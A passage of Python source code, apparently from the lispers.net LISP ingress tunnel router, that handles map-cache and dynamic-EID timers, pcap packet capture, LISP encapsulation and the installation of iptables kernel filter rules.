d = lisp.lisp_address(afi, "ffff-ffff-ffff", 48, iid)
lisp.lisp_send_map_request(lisp_sockets, lisp_ephem_port, s, d, None)
#endif
#
# Timeout Map-Cache entries.
#
lisp.lisp_timeout_map_cache(lisp.lisp_map_cache)
#
# Restart periodic timer.
#
lisp_periodic_timer = threading.Timer(60, lisp_itr_process_timer,
[lisp_sockets, lisp_ephem_port])
lisp_periodic_timer.start()
return
#enddef
#
# lisp_itr_timeout_dynamic_eids
#
# Check to see if dyanmic-EIDs have stop sending data. If so, remove the
# state and stop registering them.
#
def lisp_itr_timeout_dynamic_eids(lisp_socket):
lisp.lisp_set_exception()
now = lisp.lisp_get_timestamp()
for db in lisp.lisp_db_list:
if (db.dynamic_eid_configured() == False): continue
delete_list = []
for dyn_eid in list(db.dynamic_eids.values()):
ts = dyn_eid.last_packet
if (ts == None): continue
if (ts + dyn_eid.timeout > now): continue
#
# Check hardware if dyn-EID has had packets SENT to. We want the
# opposite but this is all we get from Arista.
#
if (lisp.lisp_program_hardware):
prefix = dyn_eid.dynamic_eid.print_prefix_no_iid()
if (lisp.lisp_arista_is_alive(prefix)):
lisp.lprint(("Hardware indicates dynamic-EID {} " + \
"still active").format(lisp.green(prefix, False)))
continue
#endif
#endif
#
# Tell ETR process so it can register dynamic-EID.
#
eid_str = dyn_eid.dynamic_eid.print_address()
ipc = "learn%{}%None".format(eid_str)
ipc = lisp.lisp_command_ipc(ipc, "lisp-itr")
lisp.lisp_ipc(ipc, lisp_socket, "lisp-etr")
lisp.lprint("Dynamic-EID {}".format( \
lisp.bold(lisp.green(eid_str, False) + " activity timeout",
False)))
delete_list.append(eid_str)
#endfor
#
# Remove the timed out entries from db.dynamic_eids{}.
#
for eid_str in delete_list: db.dynamic_eids.pop(eid_str)
#endfor
#
# Restart periodic timer.
#
threading.Timer(lisp.LISP_DEFAULT_DYN_EID_TIMEOUT,
lisp_itr_timeout_dynamic_eids, [lisp_socket]).start()
return
#enddef
#
# lisp_get_active_interfaces
#
# Get interfaces that are plugged in. Including loopback interfaces.
#
# We need to test these 3 types of lines from "ifconfig" output:
#
# aten2 Link encap:Ethernet HWaddr 00:1F:A0:07:0C:04
# eth7: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
# en0: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
#
def lisp_get_active_interfaces():
if (lisp.lisp_is_macos()): return(["en0", "en1", "lo0"])
#
# Linux distributions have different ifconfig output format.
#
gs = "Link encap"
interfaces = getoutput("ifconfig | egrep '{}'".format(gs))
if (interfaces == ""):
gs = ": flags="
interfaces = getoutput("ifconfig | egrep '{}'".format(gs))
#endif
interfaces = interfaces.split("\n")
return_interfaces = []
for interface in interfaces:
ifname = interface.split(gs)[0].replace(" ", "")
return_interfaces.append(ifname)
#endfor
return(return_interfaces)
#enddef
#
# lisp_itr_startup
#
# Intialize this LISP ITR process. This function returns no values.
#
def lisp_itr_startup():
global lisp_send_sockets
global lisp_ipc_listen_socket
global lisp_ipc_punt_socket
global lisp_ephem_listen_socket
global lisp_ephem_nat_socket
global lisp_raw_socket, lisp_raw_v6_socket
lisp.lisp_i_am("itr")
lisp.lisp_set_exception()
lisp.lisp_print_banner("ITR starting up")
#
# Get local address for source RLOC for encapsulation.
#
lisp.lisp_get_local_interfaces()
lisp.lisp_get_local_macs()
if (lisp.lisp_get_local_addresses() == False): return(False)
#
# Open send socket.
#
lisp_send_sockets[0] = lisp.lisp_open_send_socket("", lisp.LISP_AFI_IPV4)
lisp_send_sockets[1] = lisp.lisp_open_send_socket("", lisp.LISP_AFI_IPV6)
lisp_ipc_listen_socket = lisp.lisp_open_listen_socket("", "lisp-itr")
lisp_ipc_punt_socket = lisp.lisp_open_listen_socket("", "lispers.net-itr")
lisp_send_sockets[2] = lisp_ipc_listen_socket
address = "0.0.0.0" if lisp.lisp_is_raspbian() else "0::0"
lisp_ephem_listen_socket = lisp.lisp_open_listen_socket(address,
str(lisp_ephem_port))
#
# Used on for listening for Info-Replies for NAT-traversal support.
#
lisp_ephem_nat_socket = lisp.lisp_open_listen_socket("0.0.0.0",
str(lisp_ephem_nat_port))
#
# Open up raw socket so we can send with IP headers after decapsulation.
#
lisp_raw_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW,
socket.IPPROTO_RAW)
lisp_raw_socket.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
if (lisp.lisp_is_raspbian() == False):
lisp_raw_v6_socket = socket.socket(socket.AF_INET6, socket.SOCK_RAW,
socket.IPPROTO_UDP)
#endif
#
# This is used by the ITR to send RTR status change information to the
# ETR. Since RLOC-probing runs inside the lisp library, when state changes
# occur, an IPC will have to be sent from the timer thread. This is the
# only use-case for lisp.lisp_ipc_socket.
#
lisp.lisp_ipc_socket = lisp_ipc_listen_socket
#
# Start map-cache timeout timer.
#
threading.Thread(target=lisp_itr_get_capture_info).start()
#
# Load map-cache from checkpoint file before we start writing to it.
#
lisp.lisp_load_checkpoint()
#
# Should we load-split pings?
#
lisp.lisp_load_split_pings = (os.getenv("LISP_LOAD_SPLIT_PINGS") != None)
#
# Start map-cache timeout timer.
#
lisp_periodic_timer = threading.Timer(60, lisp_itr_process_timer,
[lisp_send_sockets, lisp_ephem_port])
lisp_periodic_timer.start()
#
# Start dynamic-EID timeout timer.
#
threading.Timer(lisp.LISP_DEFAULT_DYN_EID_TIMEOUT,
lisp_itr_timeout_dynamic_eids, [lisp_ipc_listen_socket]).start()
return(True)
#enddef
#
# lisp_itr_count_eid_prefixes
#
# Cound the number of "prefix" sub-commands inside of each "lisp database-
# mapping" command.
#
def lisp_itr_count_eid_prefixes():
f = open("./lisp.config", "r")
within = False
count = 0
for line in f:
if (line == "lisp database-mapping {\n"): within = True
if (line == "}\n"): within = False
if (within == False): continue
if (line[0] == " " and line.find("prefix {") != -1): count += 1
#endif
f.close()
return(count)
#enddef
#
# lisp_itr_get_local_eid_prefixes
#
# Check the number of "lisp database-mapping" commands we will process. Wait
# for them to be processed and only return when all are processed.
#
# Return array of static EID-prefixes and an array of dynamic EID-prefixes.
#
def lisp_itr_get_local_eid_prefixes():
#
# Count the number of "prefix" sub-commands within a "lisp database-
# mapping" command clause in the lisp.config file.
#
count = lisp_itr_count_eid_prefixes()
#
# Does user want us to wait longer than a second to check to see if
# commands are done. If the CPU is going to be busy during startup, the
# wait-time should be made longer..
#
wait_time = os.getenv("LISP_ITR_WAIT_TIME")
wait_time = 1 if (wait_time == None) else int(wait_time)
#
# Wait for database-mapping commands to execute. We need to retrieve
# EID-prefixes we need to listen on.
#
while (count != len(lisp.lisp_db_list)):
lisp.lprint(("Waiting {} second(s) for {} database-mapping EID-" + \
"prefixes, {} processed so far ...").format(wait_time, count,
len(lisp.lisp_db_list)))
time.sleep(wait_time)
#endwhile
#
# Return each IPv4, IPv6, or MAC EIDs. These are the ones we need to
# pass to pcap.
#
sources = []
dyn_eids = []
for db in lisp.lisp_db_list:
if (db.eid.is_ipv4() or db.eid.is_ipv6() or db.eid.is_mac()):
eid_str = db.eid.print_prefix_no_iid()
if (db.dynamic_eid_configured()): dyn_eids.append(eid_str)
sources.append(eid_str)
#endif
#endfor
return(sources, dyn_eids)
#enddef
#
# lisp_itr_get_capture_info
#
# Thead to wait for database-mapping commands to finish processing so we can
# get local EID-prefixes to be source filters for packet capture.
#
def lisp_itr_get_capture_info():
global lisp_pcap_lock
lisp.lisp_set_exception()
#
# Wait for database-mapping commands to execute. We need to retrieve
# EID-prefixes we need to listen on.
#
sources, dyn_eids = lisp_itr_get_local_eid_prefixes()
#
# If "ipc-data-plane = yes" is configured, we do not need to do any
# data-plane forwarding. There is another module running with the
# lispers.net control-plane that is doing data-plane forwarding. We'll
# get punts via the lispers.net-itr named socket. But we do have to
# packet capture RLOC-probe replies. Also capture multicast Map-Register
# messages for LISP-Decent.
#
cp_pfilter = None
if (lisp.lisp_ipc_data_plane):
lisp.lprint(lisp.bold("Data-plane packet capture disabled", False))
cp_pfilter = "(udp src port 4342 and ip[28] == 0x28)" + \
" or (ip[16] >= 224 and ip[16] < 240 and (ip[28] & 0xf0) == 0x30)"
lisp.lprint("Control-plane capture: '{}'".format(cp_pfilter))
else:
lisp.lprint("Capturing packets for source-EIDs {}".format( \
lisp.green(str(sources), False)))
#endif
if (lisp.lisp_pitr): lisp.lprint("Configured for PITR functionality")
#
# We want the kernel to handle any packets with source AND destination
# that matches any EID-prefixes for the site. Any other case, we want
# the pcap filters to get the packet to this lisp-itr process.
#
l2_overlay = lisp.lisp_l2_overlay
if (l2_overlay == False):
if (lisp.lisp_is_linux()): lisp_itr_kernel_filter(sources, dyn_eids)
#endif
#
# Build packet capture filter so we get packets for configured source EID-
# prefixes.
#
if (cp_pfilter == None):
if (lisp.lisp_pitr):
pfilter = lisp_itr_build_pcap_filter(sources, [], False, True)
else:
pfilter = lisp_itr_build_pcap_filter(sources, dyn_eids, l2_overlay,
False)
#endif
else:
pfilter = cp_pfilter
#endif
#
# User can select which interfaces to pcap on.
#
interfaces = lisp_get_active_interfaces()
pcap_list = os.getenv("LISP_PCAP_LIST")
if (pcap_list == None):
us = ""
rloc_interfaces = []
else:
eid_interfaces = list(set(pcap_list.split()) & set(interfaces))
rloc_interfaces = list(set(pcap_list.split()) ^ set(interfaces))
us = "user-selected "
lisp.lprint("User pcap-list: {}, active-interfaces: {}".format( \
pcap_list, interfaces))
interfaces = eid_interfaces
#endif
#
# Start a pcap thread so we can receive packets from applications on this
# system. But make sure the device is up on A10 devices. If ethernet MAC
# capturing, do not listen on non ethernet interfaces.
#
mac_capturing = (pfilter.find("ether host") != -1)
for device in interfaces:
if (device in ["lo", "lispers.net"] and mac_capturing):
lisp.lprint(("Capturing suppressed on interface {}, " + \
"MAC filters configured").format(device))
continue
#endif
#
# MacOS uses one interface for the RLOC interface as well as the
# EID interface. We use lo0 for the IPv4 EID and en0 for the IPv6 EID.
#
if (lisp.lisp_is_macos()):
if (device not in ["en0", "lo0"]): continue
#endif
args = [device, pfilter, lisp_pcap_lock]
lisp.lprint("Capturing packets on {}interface {}".format(us, device))
threading.Thread(target=lisp_itr_pcap_thread, args=args).start()
#endfor
if (cp_pfilter): return
#
# Start a pcap thread so we can receive RLOC-probe Map-Replies packets on
# RLOC interfaces. This is only called when LISP_PCAP_LIST is set.
#
probe_pfilter = "(udp src port 4342 and ip[28] == 0x28)"
for device in rloc_interfaces:
args = [device, probe_pfilter, lisp_pcap_lock]
lisp.lprint("Capture RLOC-probe replies on RLOC interface {}".format( \
device))
threading.Thread(target=lisp_itr_pcap_thread, args=args).start()
#endfor
return
#enddef
#
# lisp_itr_shutdown
#
# Shut down this process.
#
def lisp_itr_shutdown():
#
# Cancel periodic Info timer threads.
#
if (lisp_itr_info_timer): lisp_itr_info_timer.cancel()
#
# Close sockets.
#
lisp.lisp_close_socket(lisp_send_sockets[0], "")
lisp.lisp_close_socket(lisp_send_sockets[1], "")
lisp.lisp_close_socket(lisp_ephem_listen_socket, "")
lisp.lisp_close_socket(lisp_ephem_nat_socket, "")
lisp.lisp_close_socket(lisp_ipc_listen_socket, "lisp-itr")
lisp.lisp_close_socket(lisp_ipc_punt_socket, "lispers.net-itr")
return
#enddef
#
# lisp_itr_data_plane
#
# Do map-cache lookup and encapsulate packet.
#
def lisp_itr_data_plane(packet, device, input_interface, macs, my_sa):
global lisp_send_sockets
global lisp_ephem_port
global lisp_raw_socket, lisp_raw_v6_socket
global lisp_ipc_listen_socket
#
# Check RLOC-probe Map-Reply. We need to grab the TTL from IP header.
#
orig_packet = packet
packet, source, port, ttl = lisp.lisp_is_rloc_probe(packet, 1)
if (orig_packet != packet):
if (source == None): return
lisp.lisp_parse_packet(lisp_send_sockets, packet, source, port, ttl)
return
#endif
packet = lisp.lisp_packet(packet)
if (packet.decode(False, None, None) == None): return
#
# For locally source packets from this system, the MAC address may
# be the default router. Check source to see if assigned to this system,
# and if so, accept on interface "device".
#
if (my_sa): input_interface = device
#
# Get instance-ID for incoming interface.
#
source_eid = packet.inner_source
iid = lisp.lisp_get_interface_instance_id(input_interface, source_eid)
packet.inner_dest.instance_id = iid
packet.inner_source.instance_id = iid
#
# Print some useful header fields and strip outer headers..
#
if (macs != ""): macs = ", MACs: " + macs + ","
packet.print_packet("Receive {}{}".format(device, macs), False)
#
# Drop packet if input interface not found based on MAC address used.
#
if (device != input_interface and device != "lispers.net"):
lisp.dprint("Not our MAC address on interface {}, pcap interface {}". \
format(input_interface, device))
return
#endif
lisp_decent = lisp.lisp_decent_push_configured
if (lisp_decent):
multicast = packet.inner_dest.is_multicast_address()
local = packet.inner_source.is_local()
lisp_decent = (local and multicast)
#endif
if (lisp_decent == False):
#
# Only forward packets from source-EIDs.
#
db = lisp.lisp_db_for_lookups.lookup_cache(packet.inner_source, False)
if (db == None):
lisp.dprint("Packet received from non-EID source")
return
#endif
#
# Check to see if we are doing dynamic-EID discovery.
#
if (db.dynamic_eid_configured()):
i = lisp.lisp_allow_dynamic_eid(input_interface,
packet.inner_source)
if (i):
lisp.lisp_itr_discover_eid(db, packet.inner_source,
input_interface, i, lisp_ipc_listen_socket)
else:
e = lisp.green(packet.inner_source.print_address(), False)
lisp.dprint("Disallow dynamic-EID {} on interface {}".format(e,
input_interface))
return
#endif
#endif
if (packet.inner_source.is_local() and
packet.udp_dport == lisp.LISP_CTRL_PORT): return
#endif
#
# Do input processing for currently supported packet types..
#
igmp = False
if (packet.inner_version == 4):
igmp, packet.packet = lisp.lisp_ipv4_input(packet.packet)
if (packet.packet == None): return
packet.inner_ttl -= 1
elif (packet.inner_version == 6):
packet.packet = lisp.lisp_ipv6_input(packet)
if (packet.packet == None): return
packet.inner_ttl -= 1
else:
packet.packet = lisp.lisp_mac_input(packet.packet)
if (packet.packet == None): return
packet.encap_port = lisp.LISP_L2_DATA_PORT
#endif
#
# First check if destination is to any local EID-prefixes from database-
# mapping commands. In this case, we need to natively forward.
#
if (lisp_xtr_loopback == False):
db = lisp.lisp_db_for_lookups.lookup_cache(packet.inner_dest, False)
if (db and db.dynamic_eid_configured == False):
lisp.dprint(("Packet destined to local EID-prefix {}, " + \
"natively forwarding").format(db.print_eid_tuple()))
packet.send_packet(lisp_raw_socket, packet.inner_dest)
return
#endif
#endif
#
# Do map-cache lookup.
#
mc = lisp.lisp_map_cache_lookup(packet.inner_source, packet.inner_dest)
if (mc): mc.add_recent_source(packet.inner_source)
#
# If "secondary-iid" is configured, we want to check the secondary
# map-cache if a lookup miss occured in the default IID for this source
# EID-prefix. If destination EID found in secondary map-cache, use it.
# Otherwise, send Map-Request for EID in default IID.
#
secondary_iid = db.secondary_iid if (db != None) else None
if (secondary_iid and mc and mc.action == lisp.LISP_NATIVE_FORWARD_ACTION):
dest_eid = packet.inner_dest
dest_eid.instance_id = secondary_iid
mc = lisp.lisp_map_cache_lookup(packet.inner_source, dest_eid)
if (mc): mc.add_recent_source(packet.inner_source)
#endif
#
# Map-cache lookup miss.
#
if (mc == None or lisp.lisp_mr_or_pubsub(mc.action)):
if (lisp.lisp_rate_limit_map_request(packet.inner_dest)): return
pubsub = (mc and mc.action == lisp.LISP_SEND_PUBSUB_ACTION)
lisp.lisp_send_map_request(lisp_send_sockets, lisp_ephem_port,
packet.inner_source, packet.inner_dest, None, pubsub)
if (packet.is_trace()):
lisp.lisp_trace_append(packet, reason="map-cache miss")
#endif
return
#endif
#
# Send Map-Request to see if there is a RLOC change or to refresh an
# entry that is about to time out.
#
if (mc and mc.is_active() and mc.has_ttl_elapsed()):
if (lisp.lisp_rate_limit_map_request(packet.inner_dest) == False):
lisp.lprint("Refresh map-cache entry {}".format( \
lisp.green(mc.print_eid_tuple(), False)))
lisp.lisp_send_map_request(lisp_send_sockets, lisp_ephem_port,
packet.inner_source, packet.inner_dest, None)
#endif
#endif
#
# Update stats for entry. Stats per RLOC is done in lisp_mapping.select_
# rloc().
#
mc.last_refresh_time = time.time()
mc.stats.increment(len(packet.packet))
#
# Encapsulate, native forward, or encapsulate-and-replciate packet.
#
dest_rloc, dest_port, nonce, action, rle, rloc_entry = \
mc.select_rloc(packet, lisp_ipc_listen_socket)
if (dest_rloc == None and rle == None):
if (action == lisp.LISP_NATIVE_FORWARD_ACTION):
lisp.dprint("Natively forwarding")
packet.send_packet(lisp_raw_socket, packet.inner_dest)
if (packet.is_trace()):
lisp.lisp_trace_append(packet, reason="not an EID")
#endif
return
#endif
r = "No reachable RLOCs found"
lisp.dprint(r)
if (packet.is_trace()): lisp.lisp_trace_append(packet, reason=r)
return
#endif
if (dest_rloc and dest_rloc.is_null()):
r = "Drop action RLOC found"
lisp.dprint(r)
if (packet.is_trace()): lisp.lisp_trace_append(packet, reason=r)
return
#endif
#
# Setup outer header for either unicast or multicast transmission..
#
packet.outer_tos = packet.inner_tos
packet.outer_ttl = 32 if (igmp) else packet.inner_ttl
#
# Do unicast encapsulation.
#
if (dest_rloc):
packet.outer_dest.copy_address(dest_rloc)
version = packet.outer_dest.afi_to_version()
packet.outer_version = version
source_rloc = lisp.lisp_myrlocs[0] if (version == 4) else \
lisp.lisp_myrlocs[1]
packet.outer_source.copy_address(source_rloc)
if (packet.is_trace()):
if (lisp.lisp_trace_append(packet, rloc_entry=rloc_entry) \
== False): return
#endif
#
# Encode new LISP, UDP, and outer header.
#
if (packet.encode(nonce) == None): return
if (len(packet.packet) <= 1500): packet.print_packet("Send", True)
#
# Send out on raw socket.
#
raw_socket = lisp_raw_v6_socket if version == 6 else lisp_raw_socket
packet.send_packet(raw_socket, packet.outer_dest)
elif (rle):
#
# Do replication of RLE is returned. Since we are an ITR, replicate to
# level-0 RTRs (or ETRs) only (or first-level boxes only)..
#
level = rle.rle_nodes[0].level
orig_len = len(packet.packet)
for node in rle.rle_forwarding_list:
if (node.level != level): return
packet.outer_dest.copy_address(node.address)
if (lisp_decent): packet.inner_dest.instance_id = 0xffffff
version = packet.outer_dest.afi_to_version()
packet.outer_version = version
source_rloc = lisp.lisp_myrlocs[0] if (version == 4) else \
lisp.lisp_myrlocs[1]
packet.outer_source.copy_address(source_rloc)
if (packet.is_trace()):
if (lisp.lisp_trace_append(packet) == False): return
#endif
if (packet.encode(None) == None): return
#
# Replicate out on raw socket.
#
packet.print_packet("Replicate-to-L{}".format(node.level), True)
packet.send_packet(lisp_raw_socket, packet.outer_dest)
#
# We need to strip the encapsulation header so we can add a new
# one for the next replication.
#
strip_len = len(packet.packet) - orig_len
packet.packet = packet.packet[strip_len::]
#endfor
#endif
#
# Don't need packet structure anymore.
#
del(packet)
return
#enddef
#
# lisp_itr_pcap_process_packet
#
# Receive LISP encapsulated packet from pcap.loop().
#
def lisp_itr_pcap_process_packet(device, not_used, packet):
offset = 4 if device == "lo0" else 0 if device == "lispers.net" else 14
if (lisp.lisp_frame_logging):
title = lisp.bold("Received frame on interface '{}'".format(device),
False)
frame = lisp.lisp_format_packet(packet[0:64])
lisp.lprint("{}: {}".format(title, frame))
#endif
#
# Get input interface based on source MAC address.
#
macs = ""
my_sa = False
interface = device
if (offset == 14):
interfaces, sa, da, my_sa = lisp.lisp_get_input_interface(packet)
interface = device if (device in interfaces) else interfaces[0]
macs = lisp.lisp_format_macs(sa, da)
if (interface.find("vlan") != -1): offset +=4
#
# If destination MAC address is multicast, set my_sa. Examine low-order
# bit of first byte by grabbing the second nibble and testing low-order
# bit after converting to integer.
#
if (int(da[1], 16) & 1): my_sa = True
#endif
#
# Check for VLAN encapsulation.
#
if (offset != 0):
ethertype = struct.unpack("H", packet[offset-2:offset])[0]
ethertype = socket.ntohs(ethertype)
if (ethertype == 0x8100):
vlan = struct.unpack("I", packet[offset:offset+4])[0]
vlan = socket.ntohl(vlan)
interface = "vlan" + str(vlan >> 16)
offset += 4
elif (ethertype == 0x806):
lisp.dprint("Dropping ARP packets, host should have default route")
return
#endif
#endif
if (lisp.lisp_l2_overlay): offset = 0
lisp_itr_data_plane(packet[offset::], device, interface, macs, my_sa)
return
#enddef
#
# lisp_itr_kernel_filter
#
# Supplied 'sources' array are the EID-prefixes we want the kernel to drop
# packets for. We will use iptables for Linux and ipfw for MacOS.
#
# We need this address combination support (notation S -> D):
#
# site-EID -> remote-EID processed by ITR
# site-EID -> non-EID processed by ITR
# site-EID -> site-EID processed by kernel
# non-EID -> non-EID processed by kernel
# non-EID -> remote-EID processed by kernel
# non-EID -> site-EID processed by kernel
#
# The pcap filters reflect the ITR processing combos and can be found in
# lisp_itr_build_pcap_filter(). This routine programs iptables to do the
# kernel processing combos.
#
# (1) iptables -t raw -A lisp -j ACCEPT -d <special-addresses>
# (2) iptables -t raw -A lisp -j ACCEPT -d <local-address> ...
# (3) iptables -t raw -A lisp -j ACCEPT -s <site-eid> -d <site-eid> ...
# (4) iptables -t raw -A lisp -j DROP -s <site-eid> ...
#
# (1) and (2), we want kernel to route packets. This allows loopback and
# multicast to be processed by kernel.
#
# For (3), we want the kernel to do local routing of packets inside of a site
# in this ITR.
#
# For (4), we want kernel to not touch any packets sourced from locally
# configured EIDs. That is each EID-prefix from a "lisp database-mapping"
# command. Because those EID-prefixes are pcap'ed and process by the lisp-itr
# process.
#
def lisp_itr_kernel_filter(sources, dyn_eids):
if (os.getenv("LISP_NO_IPTABLES") != None):
lisp.lprint("User selected to suppress installing iptables rules")
return
#endif
os.system("sudo iptables -t raw -N lisp")
os.system("sudo iptables -t raw -A PREROUTING -j lisp")
os.system("sudo ip6tables -t raw -N lisp")
os.system("sudo ip6tables -t raw -A PREROUTING -j lisp")
#
# Have kernel process packets for local addresses when sourced from site
# EIDs. We do not want the lisp-itr process to process such packets.
# We want the kernel to deliver packets to and from local applications.
# And we want the kernel to forward decapsulated packets out interfaces
# leading the EIDs.
#
add = "sudo ip{}tables -t raw -A lisp -j ACCEPT -d {}"
addr_set = ["127.0.0.1", "::1", "224.0.0.0/4 -p igmp", "ff00::/8",
"fe80::/16"]
addr_set += sources + lisp.lisp_get_all_addresses()
for addr in addr_set:
if (lisp.lisp_is_mac_string(addr)): continue
six = "" if addr.find(":") == -1 else "6"
os.system(add.format(six, addr))
#endfor
#
# When source and destination addresses are EIDs for this LISP site,
# we want the kernel to do local routing. But as a PITR, we don't want
# the kernel to route everything (EID-prefix 0.0.0.0/0) or we can't have
# this process encapsulate for any source address to a destination EID.
#
if (lisp.lisp_pitr == False):
add = "sudo ip{}tables -t raw -A lisp -j ACCEPT -s {} -d {}"
check = "sudo ip{}tables -t raw -C lisp -j ACCEPT -s {} -d {}"
for source in sources:
if (lisp.lisp_is_mac_string(source)): continue
if (source in dyn_eids): continue
six = "" if source.find(":") == -1 else "6"
for s in sources:
if (lisp.lisp_is_mac_string(s)): continue
if (s in dyn_eids): continue
if (s.find(".") != -1 and source.find(".") == -1): continue
if (s.find(":") != -1 and source.find(":") == -1): continue
if (getoutput(check.format(six, source, s)) == ""):
continue
#endif
os.system(add.format(six, source, s))
#endfor
#endfor
#endif
#
# Now put in drop rules for each "lisp database-mapping" EID-prefix.
#
drop = "sudo ip{}tables -t raw -A lisp -j DROP -s {}"
for source in sources:
if (lisp.lisp_is_mac_string(source)): continue
six = "" if source.find(":") == -1 else "6"
os.system(drop.format(six, source))
#endif
#
# Print out rules we just configured.
#
rules = getoutput("sudo iptables -t raw -S lisp").split("\n")
rules += getoutput("sudo ip6tables -t raw -S lisp").split("\n")
lisp.lprint("Using kernel filters: {}".format(rules))
#
# Check if we need to put in a iptables rule workaround for the virtio TCP
# checksum corruption problem for KVM guest OSes. Check environmnt
# variable LISP_VIRTIO_BUG.
#
# Note a debian host system that runs docker will need the following
# command so ip6tables works inside of the docker container:
#
# sudo modprobe ip6table_filter
#
if (os.getenv("LISP_VIRTIO_BUG") != None):
c = ("sudo iptables -A POSTROUTING -t mangle -p tcp -j " + \
"CHECKSUM --checksum-fill; ")
c += ("sudo iptables -A POSTROUTING -t mangle -p udp -j " + \
"CHECKSUM --checksum-fill; ")
c += ("sudo ip6tables -A POSTROUTING -t mangle -p tcp -j " + \
"CHECKSUM --checksum-fill; ")
c += ("sudo ip6tables -A POSTROUTING -t mangle -p udp -j " + \
"CHECKSUM --checksum-fill")
os.system(c)
virtio = lisp.bold("virtio", False)
lisp.lprint("{} bug workaround, configure '{}'".format(virtio, c))
#endif
return
#enddef
#
# lisp_itr_build_pcap_filter
#
# Build pcap filter and return string to caller.
#
def lisp_itr_build_pcap_filter(sources, dyn_eids, l2_overlay, pitr):
if (l2_overlay):
pfilter = "ether[6:4] >= 0 and ether[10:2] >= 0"
lisp.lprint("Using pcap filter: '{}'".format(pfilter))
return(pfilter)
#endif
ether_pfilter = "(not ether proto 0x806)"
probe_pfilter = " or (udp src port 4342 and ip[28] == 0x28)"
decent_pfilter = \
" or (ip[16] >= 224 and ip[16] < 240 and (ip[28] & 0xf0) == 0x30)"
src_pfilter = ""
dst_pfilter = ""
for source in sources:
insert_source = source
if (lisp.lisp_is_mac_string(source)):
insert_source = source.split("/")[0]
insert_source = insert_source.replace("-", "")
mac_str = []
for i in range(0, 12, 2): mac_str.append(insert_source[i:i+2])
insert_source = "ether host " + ":".join(mac_str)
#endif
src_pfilter += "{}".format(insert_source)
if (source not in dyn_eids): dst_pfilter += "{}".format(insert_source)
if (sources[-1] == source): break
src_pfilter += " or "
if (source not in dyn_eids): dst_pfilter += " or "
#endfor
if (dst_pfilter[-4::] == " or "): dst_pfilter = dst_pfilter[0:-4]
#
# If "lisp-nat = yes" is configured, then we are a PETR and we need
# to accept packets for local EIDs (assigned to loopback interfaces).
# So allow the first one to be accepted.
#
lisp_nat = getoutput("egrep 'lisp-nat = yes' ./lisp.config")
lisp_nat = (lisp_nat != "" and lisp_nat[0] == " ")
loopback = lisp.lisp_get_loopback_address() if (lisp_nat) else None
addr_pfilter = ""
addresses = lisp.lisp_get_all_addresses()
for addr in addresses:
if (addr == loopback): continue
addr_pfilter += "{}".format(addr)
if (addresses[-1] == addr): break
addr_pfilter += " or "
#endif
if (src_pfilter != ""):
src_pfilter = " and (src net {})".format(src_pfilter)
#endif
if (dst_pfilter != ""):
dst_pfilter = " and not (dst net {})".format(dst_pfilter)
#endif
if (addr_pfilter != ""):
addr_pfilter = " and not (dst host {})".format(addr_pfilter)
#endif
#
# A PITR wants to see packets from anywhere so it can encap to possible
# LISP sites. But we want the kernel to route and consume for RLOCs for
# this system.
#
if (pitr):
dst_pfilter = ""
addr_pfilter = addr_pfilter.replace("dst ", "")
#endif
#
# Concatenate all the filters.
#
pfilter = ether_pfilter + src_pfilter + dst_pfilter + addr_pfilter
pfilter += probe_pfilter
pfilter += decent_pfilter
lisp.lprint("Using pcap filter: '{}'".format(pfilter))
return(pfilter)
#enddef
#
# lisp_itr_pcap_thread
#
# Receive LISP encapsulated packet from pcap.
#
def lisp_itr_pcap_thread(device, pfilter, pcap_lock):
lisp.lisp_set_exception()
if (lisp.lisp_is_python2()):
pcap_lock.acquire()
pcap = pcappy.open_live(device, 9000, 0, 100)
pcap_lock.release()
pcap.filter = pfilter
pcap.loop(-1, lisp_itr_pcap_process_packet, device)
#endif
if (lisp.lisp_is_python3()):
pcap_lock.acquire()
pcap = pcapy.open_live(device, 9000, 0, 100)
pcap_lock.release()
pcap.setfilter(pfilter)
while(True):
header, packet = pcap.next()
lisp_itr_pcap_process_packet(device, None, packet)
#endwhile
#endif
return
#enddef
#
# lisp_itr_process_info_timer
#
# Time to send a periodic Info-Request message. This must be done less often
# then sending periodic Map-Registers as well as less the the NAT timeout
# value which is usually one minute.
#
def lisp_itr_process_info_timer():
global lisp_itr_info_timer
global lisp_ephem_nat_socket
global lisp_send_sockets
lisp.lisp_set_exception()
#
# Build Info-Request messages if we have any private RLOCs in database-
# mappings.
#
sockets = [lisp_ephem_nat_socket, lisp_ephem_nat_socket,
lisp_ipc_listen_socket]
lisp.lisp_build_info_requests(sockets, None, lisp.LISP_CTRL_PORT)
#
# Restart periodic timer.
#
lisp_itr_info_timer.cancel()
lisp_itr_info_timer = threading.Timer(lisp.LISP_INFO_INTERVAL,
lisp_itr_process_info_timer, [])
lisp_itr_info_timer.start()
return
#enddef
#
# lisp_itr_map_resolver_command
#
# Call lispconfig.lisp_map_resolver_command and set "test-mr" timer.
#
def lisp_itr_map_resolver_command(kv_pair):
global lisp_send_sockets
global lisp_ephem_port
global lisp_itr_info_timer
lispconfig.lisp_map_resolver_command(kv_pair)
if (lisp.lisp_test_mr_timer == None or
lisp.lisp_test_mr_timer.is_alive() == False):
lisp.lisp_test_mr_timer = threading.Timer(2, lisp.lisp_test_mr,
[lisp_send_sockets, lisp_ephem_port])
lisp.lisp_test_mr_timer.start()
#endif
#
# Trigger a Info-Request if we are doing NAT-traversal.
#
lisp_itr_info_timer = threading.Timer(0, lisp_itr_process_info_timer, [])
lisp_itr_info_timer.start()
return
#enddef
#
# lisp_itr_database_mapping_command
#
# Add database-mapping entry so ITR can packet capture on packets only from
# sources from the *first* database-mapping configured.
#
def lisp_itr_database_mapping_command(kv_pair):
lispconfig.lisp_database_mapping_command(kv_pair)
return
#enddef
#
# lisp_itr_xtr_command
#
# Call lispconfig.lisp_xtr_command() but pass socket parameters to starting
# the RLOC-probing timer if "rloc-probing = yes".
#
def lisp_itr_xtr_command(kv_pair):
global lisp_ephem_listen_socket
#
# Cache current state for nat-traversal and rloc-probing so we know if
# we should trigger..
#
nat_traversal = lisp.lisp_nat_traversal
rloc_probing = lisp.lisp_rloc_probing
#
# Execute command.
#
lispconfig.lisp_xtr_command(kv_pair)
#
# Did "nat-traversal = yes" or "rloc-probing = yes" just happen?
#
nat_now_on = (nat_traversal == False and lisp.lisp_nat_traversal and \
lisp.lisp_rloc_probing)
